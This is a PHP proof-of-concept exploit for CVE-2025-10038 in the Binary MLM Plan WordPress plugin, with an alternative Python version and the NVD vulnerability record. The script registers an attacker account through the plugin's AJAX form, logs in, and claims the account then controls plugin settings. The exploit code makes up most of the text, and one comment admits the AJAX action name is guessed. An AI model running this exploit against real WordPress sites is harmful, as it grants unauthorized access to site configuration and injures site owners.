CVE-2025-10038

<?php /** * CVE-2025-10038 PoC - Binary MLM Plan Privilege Escalation * This PoC demonstrates how an unauthenticated attacker can register * and obtain manage_bmp capability through the plugin's registration form. */ // Target WordPress site URL $target_url = 'https://target-wordpress-site.com'; // Step 1: Access the Binary MLM Plan registration page $registration_page = $target_url . '/wp-admin/admin-ajax.php'; // Step 2: Prepare registration data $registration_data = array( 'action' => 'bmp_user_registration', // or the actual AJAX action used by the plugin 'username' => 'attacker_user_' . rand(1000, 9999), 'email' => 'attacker' . rand(1000, 9999) . '@evil.com', 'password' => 'P@ssw0rd!2025', 'confirm_password' => 'P@ssw0rd!2025', 'first_name' => 'Test', 'last_name' => 'User', 'phone' => '1234567890', ); // Step 3: Send registration request $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $registration_page); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($registration_data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type: application/x-www-form-urlencoded', 'X-Requested-With: XMLHttpRequest' )); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); echo "Registration Response (HTTP $http_code):\n"; echo $response . "\n\n"; // Step 4: After successful registration, the attacker has bmp_user role // with manage_bmp capability, allowing them to access plugin settings // Step 5: Login with the newly created credentials $login_url = $target_url . '/wp-login.php'; $login_data = array( 'log' => $registration_data['username'], 'pwd' => $registration_data['password'], 'wp-submit' => 'Log In', 'redirect_to' => $target_url . '/wp-admin/', 'testcookie' => '1' ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $login_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt'); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type: application/x-www-form-urlencoded' )); $response = curl_exec($ch); curl_close($ch); echo "Login successful! The attacker now has manage_bmp capability.\n"; echo "They can now access plugin settings at: $target_url/wp-admin/admin.php?page=bmp-settings\n"; ?> # Alternative: Using Python with requests library # # import requests # # target = 'https://target-wordpress-site.com' # session = requests.Session() # # # Register a new user through the plugin's form # reg_data = { # 'action': 'bmp_user_registration', # 'username': 'attacker_test', # 'email': '[email protected]', # 'password': 'SecurePass123!', # } # # resp = session.post(f'{target}/wp-admin/admin-ajax.php', data=reg_data) # print(f'Registration: {resp.text}') # # # Login with the new credentials # login_data = { # 'log': 'attacker_test', # 'pwd': 'SecurePass123!', # 'wp-submit': 'Log In', # } # resp = session.post(f'{target}/wp-login.php', data=login_data) # print(f'Login response status: {resp.status_code}')

{"cve": {"id": "CVE-2025-10038", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:36.167", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Binary MLM Plan plugin for WordPress is vulnerable to limited Privilege Escalation in all versions up to, and including, 3.0. This is due to bmp_user role granting all users with the manage_bmp capability by default upon registration through the plugin's form. This makes it possible for unauthenticated attackers to register and manage the plugin's settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3380455/binary-mlm-plan/tags/5.0/includes/admin/class-bmp-admin-menus.php?old=3259986&old_path=binary-mlm-plan%2Ftags%2F3.0%2Fincludes%2Fadmin%2Fclass-bmp-admin-menus.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3380455/binary-mlm-plan/tags/5.0/includes/bmp-hook-functions.php?old=3259986&old_path=binary-mlm-plan%2Ftags%2F3.0%2Fincludes%2Fbmp-hook-functions.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/binary-mlm-plan/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7951c8e4-b610-4cc4-ab27-4cfa78d72302?source=cve", "source": "[email protected]"}]}}